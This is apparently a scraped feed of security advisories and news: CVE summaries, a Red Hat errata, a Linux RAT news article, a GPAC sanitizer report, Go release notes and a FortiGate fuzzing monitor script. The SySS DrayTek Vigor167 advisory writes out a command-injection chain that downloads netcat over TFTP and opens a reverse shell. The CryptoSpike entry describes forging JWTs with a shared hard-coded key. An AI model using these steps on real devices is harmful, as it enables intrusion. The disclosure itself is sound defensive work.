A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens.

A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens  
 

**Introduction**

The CryptoSpike system installation packages consist of OVA/OVF files that, once deployed on hypervisors, start the installation steps to obtain a running Docker environment.

By analyzing the Docker configuration files and the host server file system, it is verified that the RSA key pair used by the system to sign and verify JWT token is not randomly generated during the system installation/initialization, in fact being hard-coded inside the OVA/OVF packages, thus resulting in JWT token being valid for all customers deployed instances.

**Steps to reproduce**

Deploy the CryptoSpike Leader OVA file two times on a hypervisor and wait until the initial startup sequence is completed.

Connect in SSH to the two running servers and compare the content of the file containing the RSA private key at the path /prolion/config/core_services/auth_service/keys/priv.pem, for example:

As shown in the picture above, the key pair is identical. Despite the private key being encrypted, by analyzing the docker-compose.yml file in the core_services service group, it is possible to find the password which allows to easily decrypt the private key.

Additionally, there is no evidence of a procedure to generate a new private key inside product documentation or inside support scripts in the Leader server file system.

CVE-2023-36647: CVCN

An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-023 Product: Vigor167 Manufacturer: DrayTek Affected Version(s): 5.2.2 Tested Version(s): 5.2.2 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2023-09-22 Solution Date: 2023-11-16 Public Disclosure: 2023-12-06 CVE Reference: CVE-2023-47254 Author of Advisory: Fabian Krone, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Vigor167 is a VDSL2 35b Supervectoring Modem. The manufacturer describes the product as follows (see \[1\]): "Vigor167 is a VDSL2 35b modem/router." Due to missing input validation, the command-line interface of the device is vulnerable to an OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Vigor167 has a command-line interface available via both Telnet and SSH. This interface requires a login with any account available in the web interface. This also includes accounts which were denied every access according to their group settings. Afterward, a limited set of commands is available to the user. The ping command present allows injecting commands which are then executed on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Commands can be injected with backticks (\`\`). The current working directory can be printed out with the following command: vigor> exec ping \`pwd\` ping: /tmp: Unknown host Another possibility is to wrap the OS command in parentheses following a dollar sign like $(pwd). The available commands are very limited. For example, only a small fraction of the standard output from the injected commands is displayed. Furthermore, space characters lead to evaluation errors. In order to achieve a full reverse shell, some of BusyBox's internal commands can be used. A TFTP server is hosted as preparation on a computer which is reachable by Vigor167 over the network. A statically compiled version of Netcat\[2\] is hosted on the TFTP server. First, the operating system of Vigor167 is instructed to download the file: vigor> exec ping \`busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host ${IFS} is a POSIX variable that contains the field separator and serves as replacement for the space character. Then, the executable flag is set on the transferred Netcat binary: vigor> exec ping \`chmod${IFS}+x${IFS}/tmp/netcat\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host On the computer hosting the TFTP server, a Netcat listener is opened. Then, a reverse shell can be spawned: vigor> exec ping \`/tmp/netcat${IFS}192.168.100.5${IFS}9001${IFS}-e${IFS}ash\` The reverse shell is opened to the targeted host: Connection from 192.168.100.1:43354 sh: turning off NDELAY mode pwd /tmp Vigor167 was used in modem mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the modem's firmware to version 5.2.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-07-30: Vulnerability discovered 2023-09-22: Vulnerability reported to manufacturer 2023-11-16: Patch released by manufacturer 2023-12-06: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Vigor167 https://www.draytek.com/products/vigor167 \[2\] Statically compiled MIPS32 Netcat https://github.com/darkerego/mips-binaries/blob/master/netcat \[3\] SySS Security Advisory SYSS-2023-023 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-023.txt \[4\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Fabian Krone of SySS GmbH. E-Mail: fabian.krone@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian\_Krone.asc Key ID: 0xBFDF30ABD10EA0F4 Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEECt7Sqq4nfdqo8MBRv98wq9EOoPQFAmVouRMACgkQv98wq9EO oPRkjhAAnkZCXYM9lqXIbN+pGZoA2Zv93z8JXv34vIhCahv1G47ocJ0L7kLb7KNz +EbLTEnoh9Kxukw7tjNV6zvHRhav2o5KQBaelgGyCAmgtcKp30eCkN0sO4ocBqm5 wBYbYxVzOk6+aMOxIR6B496lT5AvFtzHXeCuwm4Vewpv/v7L78ixA1vnD+cjJuHq BdA/IYxrQKUEeZBlBqNM1WFe2AUxhaxGnskBrQtnZcblrJwLj3CY4UCbAehFCN29 p0iw6ntnMfpSP85nwM7mNIQo1UFWvA3Dnx6sVK7LjokX+bBAgrjjklxUdZoN1exa htT12p6lE9UNWteFt0xkgdMRkTM48CUsDpiQORIRTbb20Haz9byNTieH3UxX/OLE mU/D/BhfX4F55f0Yxlz/kJ+5hLEv4EUUIfuM4uM6vntH1E8Y/FGMxdpWVqtvCU64 U6mr52/ZLWKxyyp1+qZn2UpkP9zntO8sNUd2Yt3TqpNfOydJGNff//A5gqPkJy6B s1bZEYNWN6zpkkVukFT+EIjQHyA8OaTud8TUmo0uuvN240S74yqKpb7czaAjdOwn c5h6IlqEYu70lpnEc2d9UFRN4nGJ/NiLuimDbFjaqtjzGa+rDFNNSHDvS8jN+tN5 bgZ6SPy+mXNh07dqET/SVaI8P/yIZmNIENtNrW7z6fbr6F+aKfk= =7izf -----END PGP SIGNATURE-----

CVE-2023-47254

The next parameter in the /accounts/login endpoint of Seafile 9.0.6 allows attackers to redirect users to arbitrary sites.

CVE-2023-28874: Seafile Community Edition - Seafile Admin Manual

Red Hat Security Advisory 2023-7705-03 - Red Hat Build of Apache Camel for Quarkus 2.13.3 release and security update is now available. The purpose of this text-only errata is to inform you about the security issues fixed. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7705.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Build of Apache Camel for Quarkus 2.13.3 security update (RHBQ 2.13.9.Final)  
Advisory ID:        RHSA-2023:7705-03  
Product:            Red Hat Integration  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7705  
Issue date:         2023-12-07  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

Red Hat Build of Apache Camel for Quarkus 2.13.3 release and security update is now available (updates to RHBQ 2.13.9.Final).  The purpose of this text-only errata is to inform you about the security issues fixed.

 Red Hat Product Security has rated this update as having an impact of Important.  
 A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

A security update for Red Hat Build of Apache Camel for Quarkus 2.13.3 is now available (updates to RHBQ 2.13.9.Final).  The purpose of this text-only errata is to inform you about the security issues fixed.  
 Red Hat Product Security has rated this update as having an impact of Important.

 A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

 Security Fix(es):

  * CVE-2023-5072 JSON-java: parser confusion leads to OOM  
   * CVE-2023-39410 avro: apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK  
   * CVE-2023-35887 sshd-common: apache-mina-sshd: information exposure in SFTP server implementations  
   * CVE-2023-34462 netty: SniHandler 16MB allocation leads to OOM  
   * CVE-2023-34455 snappy-java: Unchecked chunk length leads to DoS

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/cve/CVE-2023-5072  
https://bugzilla.redhat.com/show_bug.cgi?id=2215445  
https://bugzilla.redhat.com/show_bug.cgi?id=2216888  
https://bugzilla.redhat.com/show_bug.cgi?id=2240036  
https://bugzilla.redhat.com/show_bug.cgi?id=2242521  
https://bugzilla.redhat.com/show_bug.cgi?id=2246417

Red Hat Security Advisory 2023-7705-03

By Deeba Ahmed
Discovered by the cybersecurity researchers at Group-IB; the new Linux RAT, dubbed Krasue, is targeting telecom firms in Thailand.
This is a post from HackRead.com Read the original post: New XorDdos-Linked Linux RAT Krasue Targeting Telecom Firms

The Krasue Linux RAT is quite sophisticated, and equipped with the capability to evade detection through Rootkit and RTSP communication.

Group-IB, a leading cybersecurity company, has uncovered a sophisticated new Linux RAT (Remote Access Trojan) they have dubbed “Krasue.” The malware is actively targeting organizations, mainly telecommunication firms, in Thailand and has been active since 2021.

GroupIB’s Threat Intelligence unit researchers found that Krause operates by gaining access to the targeted network and uses its rootkit capabilities to maintain persistence and ensure stealthy access.

The researchers are still investigating the initial infection vector and the full scale of the RAT’s usage. However, they believe that potential methods include vulnerability exploitation, deceptive downloads, and credential brute force attacks.

A notable feature of Krause is that it uses the Real Time Streaming Protocol (RTSP) for communication with its C2 server. This is an unusual tactic and is most likely used to evade detection by security software.

Profile of Krasue RAT (Credit: Group-IB)

Report author Sharmine Low, Group-IB’s Malware Analyst, wrote that Krause is named after a nocturnal spirit mentioned in Southeast Asian folklore. It lets cybercriminals remotely access and control compromised systems and remain undetected for a significant period.

Krasue uses multiple embedded rootkits to ensure compatibility with different Linux kernel versions. Interestingly, as with several other Linux rootkits, Krasue’s rootkit draws its functionalities from publicly available sources, specifically incorporating code from three open-source Linux Kernel Module rootkits.

This embedded rootkit can hook key system calls like kill(), network-related functions, and file listing operations to effectively mask its presence and evade detection. Researchers believe that this RAT was created by the same person who developed the XorDdos Linux Trojan or someone who has access to its source code.

Benyatip Hongto, Group-IB’s Business Development Manager in Thailand, highlighted the company’s commitment and proactive efforts to fighting cybercrime, including the planned opening of a Digital Crime Resistance Center in Thailand and their partnership with leading cybersecurity distributor nForce.

Upon discovering Krause, Group-IB researchers promptly notified their Threat Intelligence customers and published a report with YARA rules, which was shared with Thai authorities including ThaiCERT and TTC-CERT.

This revelation underscores the ever-looming threat of cyber risks and the need for strong cybersecurity measures. Organizations must be aware of threats like Krause and implement suitable security measures like strict access control, regular patching, and advanced threat detection solutions.

****_RELATED ARTICLES_****

1.  **New Cylance Ransomware Targets Linux and Windows**
2.  **Patched OpenSSH Exploited for IoT, Linux Cryptomining**
3.  **Free Download Manager Site Pushed Linux Password Stealer**
4.  **Kinsing Crypto Malware Hits Linux Systems via Apache Flaw**
5.  **Hamas Targeting Israelis with New BiBi-Linux Wiper Malware**

New XorDdos-Linked Linux RAT Krasue Targeting Telecom Firms

gpac 2.3-DEV-rev617-g671976fcc-master contains memory leaks in gf_mpd_resolve_url media_tools/mpd.c:4589.

1、Version  
./MP4Box -version  
MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master  
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io/

Please cite our work in your research:  
GPAC Filters: https://doi.org/10.1145/3339825.3394929  
GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:  
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SSL GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_JPEG GPAC\_HAS\_PNG GPAC\_HAS\_LINUX\_DVB GPAC\_DISABLE\_3D

2、ASAN Log  
\[DASH\] Updated manifest:  
P#1: start 0 - duration 0 - xlink none  
\[DASH\] Manifest after update:  
P#1: start 0 - duration 0 - xlink none  
\[DASH\] Setting up period start 0 duration 0 xlink none ID DID1  
\[DASH\] Cannot compute default segment duration  
\[DASH\] AS#1 changed quality to bitrate 10 kbps - Width 1280 Height 720 FPS 30/1 (playback speed 1)  
\[DASH\] AS#2 changed quality to bitrate 120 kbps - Width 384 Height 256 FPS 30/1 (playback speed 1)  
\[DASH\] AS#3 changed quality to bitrate 120 kbps - Width 384 Height 256 FPS 30/1 (playback speed 1)  
\[DASH\] AS#4 changed quality to bitrate 120 kbps - Width 448 Height 256 FPS 30/1 (playback speed 1)  
\[DASH\] AS#5 changed quality to bitrate 120 kbps - Width 448 Height 256 FPS 30/1 (playback speed 1)  
\[DASH\] AS#6 changed quality to bitrate 120 kbps - Width 384 Height 208 FPS 30/1 (playback speed 1)  
\[DASH\] AS#7 changed quality to bitrate 120 kbps - Width 448 Height 208 FPS 30/1 (playback speed 1)  
\[DASH\] AS#8 changed quality to bitrate 120 kbps - Width 448 Height 208 FPS 30/1 (playback speed 1)  
\[DASH\] No ROUTE entity on HTTP request  
\[DASH\] AST at init 1621274304781  
\[DASH\] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07)  
\[DASH\] No ROUTE entity on HTTP request  
\[DASH\] Segment duration unknown - cannot estimate current startNumber  
\[DASH\] No ROUTE entity on HTTP request  
\[DASH\] AST at init 1621274304781  
\[DASH\] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07)  
\[DASH\] No ROUTE entity on HTTP request  
\[DASH\] AST at init 1621274304781  
\[DASH\] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07)  
\[DASH\] No ROUTE entity on HTTP request  
\[DASH\] AST at init 1621274304781  
\[DASH\] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07)  
\[DASH\] No ROUTE entity on HTTP request  
\[DASH\] AST at init 1621274304781  
\[DASH\] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07)  
\[DASH\] No ROUTE entity on HTTP request  
\[DASH\] AST at init 1621274304781  
\[DASH\] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07)  
\[DASH\] No ROUTE entity on HTTP request  
\[DASH\] AST at init 1621274304781  
\[DASH\] At current time 78824071088 ms: Initializing Timeline: startNumber=1 segmentNumber=78824071 segmentDuration=1.000000 - 0.000 seconds in segment (start range 7.88241e+07)  
\[DASH\] Unable to resolve initialization URL: Bad Parameter  
Filter dashin failed to setup: Bad Parameter  
Filters not connected:  
fout (dst=crash24\_dash.mpd:gpac:segdur=10000/1000:profile=full:!sap:buf=1500:!check\_dur:pssh=v:subs\_sidx=0) (idx=1)  
Arg segdur set but not used  
Arg profile set but not used  
Arg !sap set but not used  
Arg buf set but not used  
Arg !check\_dur set but not used  
Arg pssh set but not used  
Arg subs\_sidx set but not used  
Error DASHing file: Bad Parameter

\=================================================================  
\==3766==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 50 byte(s) in 1 object(s) allocated from:  
#0 0x7f8f1245b9a7 in \_\_interceptor\_strdup ../../../../src/libsanitizer/asan/asan\_interceptors.cpp:454  
#1 0x7f8f112d489f in gf\_mpd\_resolve\_url media\_tools/mpd.c:4589  
#2 0x7f8f11303e24 in gf\_dash\_resolve\_url media\_tools/dash\_client.c:3447

SUMMARY: AddressSanitizer: 50 byte(s) leaked in 1 allocation(s).

3、Reproduction  
./MP4Box -dash 10000 $poc

4、poc  
crash24.zip

5、Impact  
This vulnerability is capable of causing crashes, or lead to dos.

6、 Env  
Linux dr0v-virtual-machine 6.2.0-36-generic #37 SMP PREEMPT\_DYNAMIC Mon Oct 9 15:34:04 UTC 2 x86\_64 x86\_64 x86\_64 GNU/Linux  
AFL++ 4.09a

7、Credit  
dr0v

CVE-2023-48958: LeakSanitizer: detected memory leaks in in gf_mpd_resolve_url media_tools/mpd.c:4589 · Issue #2689 · gpac/gpac

strongSwan before 5.9.12 has a buffer overflow and possible unauthenticated remote code execution via a DH public value that exceeds the internal buffer in charon-tkm's DH proxy. The earliest affected version is 5.3.0. An attack can occur via a crafted IKE_SA_INIT message.

CVE-2023-41913: Releases · strongswan/strongswan

Using go get to fetch a module with the ".git" suffix may unexpectedly fallback to the insecure "git://" protocol if the module is unavailable via the secure "https://" and "git+ssh://" protocols, even if GOINSECURE is not set for said module. This only affects users who are not using the module proxy and are fetching modules directly (i.e. GOPROXY=off).

Hello gophers,

We have just released Go versions 1.21.5 and 1.20.12, minor point releases.

These minor releases include 3 security fixes following the security policy:

*   net/http: limit chunked data overhead
    
    A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body.
    
    A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request.
    
    Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
    
    Thanks to Bartek Nowotarski for reporting this issue.
    
    This is CVE-2023-39326 and Go issue https://go.dev/issue/64433.
    
*   cmd/go: go get may unexpectedly fallback to insecure git
    
    Using go get to fetch a module with the ".git" suffix may unexpectedly fallback  
    to the insecure "git://" protocol if the module is unavailable via the secure  
    "https://" and "git+ssh://" protocols, even if GOINSECURE is not set for said  
    module. This only affects users who are not using the module proxy and are  
    fetching modules directly (i.e. GOPROXY=off).
    
    Thanks to David Leadbeater for reporting this issue.
    
    This is CVE-2023-45285 and Go issue https://go.dev/issue/63845.
    
*   path/filepath: retain trailing \ when cleaning paths like \\?\c:\
    
    Go 1.20.11 and Go 1.21.4 inadvertently changed the definition of the volume name in Windows paths starting with \\?\, resulting in filepath.Clean(\\?\c:\) returning \\?\c: rather than \\?\c:\ (among other effects). The previous behavior has been restored.
    
    This is an update to CVE-2023-45283 and Go issue https://go.dev/issue/64028.
    

View the release notes for more information:  
https://go.dev/doc/devel/release#go1.21.5

You can download binary and source distributions from the Go website:  
https://go.dev/dl/

To compile from source using a Git clone, update to the release with  
git checkout go1.21.5 and build as usual.

Thanks to everyone who contributed to the releases.

Cheers,  
Carlos and Dmitri for the Go team

CVE-2023-45285: [security] Go 1.21.5 and Go 1.20.12 are released

An issue exists in SoftIron HyperCloud where compute nodes may come online immediately without following the correct initialization process.  In this instance, workloads may be scheduled on these nodes and deploy to a failed or erroneous state, which impacts the availability of these workloads that may be deployed during this time window.

This issue impacts HyperCloud versions from 2.0.0 to before 2.0.3.



CVE-2023-45085: Releases - HyperCloud Docs

This is a small extension script to monitor suff.py, or the Simple Universal Fortigate Fuzzer, and to collect crashlogs for future analysis.

#!/usr/bin/env python3  
# suff_monitor.py -- basic monitoring for fuzzing scenarios (suff/burp/mutiny)  
#   
# -- updates --  
# 22.11.2023 @ 02:23 :: shame init version ready to go  
# 21.11.2023 @ 19:18 :: log me if you can  
# 21.11.2023 @ 15:14 :: added: time, sleep, log2fp  
# 21.11.2023 @ 01:19 :: started this lame code  
#   
# idea - run suff_monitor.py against the box you're testing (fgvm):  
# - add time to sleep and date to log updates  
# - log in (so same creds as for suff.py, postauth testing, etc)  
# - get ver/info -> log2file  
# ** (should be ready at this stage, so): **  
#   while true:  
#       check_diag_deb(+log2file,+a)  
#       sleep 1  
#  end_of_file  
#   
# -------------  
#   
# for more details:  
#   https://code610.blogspot.com/2023/12/monitoring-suff.html  
#   https://code610.blogspot.com/2023/04/fuzzing-fortigate-7.html    
#   https://github.com/c610/free/blob/master/suff-v0.1.py  
#   https://github.com/c610/free/blob/master/fg7stack_poc.py  
#   
# 

from netmiko import Netmiko  
import sys,os  
import time  
import paramiko

###################  
##############  
########  
####  
##  
#

fplog = open('saveme.log','+a')

command = 'diag debug crashlog show' # did you enable logs in your FGVM?

def connect_to_crashlog():

         # set up for the target  
    try:

                fw_01 = {  
          'host':'192.168.56.231',  
          'username':'admin',  
          'password':'P@ssw0rd',  
          'device_type':'fortinet',  
          'timeout':3  
          }

        net_connect = Netmiko( **fw_01 )  
        print("+ Connected to FG!")  
        print("+    logfile: savethis.log")

        fplog.write('----starting suff_monitor.py ----\n')  
        fplog.write(net_connect)    
        fplog.write('\n-- results below: --\n')

        # if we're connected: check diag debug crashlog (or any other you'd like to)  
        send_logcheck_cfg = net_connect.send_config_set( command  ) 

                fplog.write(send_logcheck_cfg)  
        fplog.write('\n---- next while loop ----\n')

                print("+ looks like we just sent this command:\n\t%s\n\n" % send_logcheck_cfg )

        print("send_init_cfg finished")

    ## check crashlog finished 

    except paramiko.ssh_exception.SSHException as e:  
        print(" > connection error: %s" % e)

    except ConnectionResetError as e:  
        print("> connection error2: %s" % e)

    except UnboundLocalError as e:  
        print("UnboundLocalError: local variable 'net_connect' referenced before assignment")  
        print("> unbound variable error: %s" % e)

## end of connect_to_crashlog()   
# 

##########  
#### main  
##########

print('y0;[')  
print('starting: connect_to_crashlog()')

while True:

    print('debug: connect_to_crashlog() starting...')

    connect_to_crashlog()

    print("... sleeping 1...")  
    time.sleep(1) 

    print('sleep done. next True iter...')

    ####   
print("finished main()")

Tag

#ssh